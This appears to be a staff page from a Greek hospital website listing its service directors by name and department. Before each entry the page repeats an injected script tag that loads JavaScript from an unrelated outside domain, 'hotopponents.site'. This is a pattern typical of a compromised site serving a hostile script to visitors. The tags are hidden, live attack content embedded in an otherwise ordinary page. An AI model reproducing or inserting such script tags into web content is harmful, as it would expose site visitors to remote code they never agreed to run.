Διευθυντές Υπηρεσιών

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Μαρία Γιογκατζή

Γενική Διευθύντρια
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Χρυσούλα Σαμψωνίδου

Δ/ντρια Οικονομικών Υπ.
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Δημήτριος Ματάμης

Δ/ντης Ιατρικής Υπηρεσίας
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Γρηγόρης Σοφιαλίδης

Δ/ντής Τεχνικής Υπηρεσίας
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Αθανασία Χούτα-Χυτήρη

Δ/ντρια ΝοσηλευτικήςΥπ.
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Βασίλης Δασκαλάκης

Δ/ντής Υπ. Πληροφορικής
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Χαρίκλεια Χαριζάνη

Δ/ντρια Διοικητικής Υπ.
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Λιάνα Μιχαηλίδου

Δ/ντρια Ποιοτικού Ελέγχου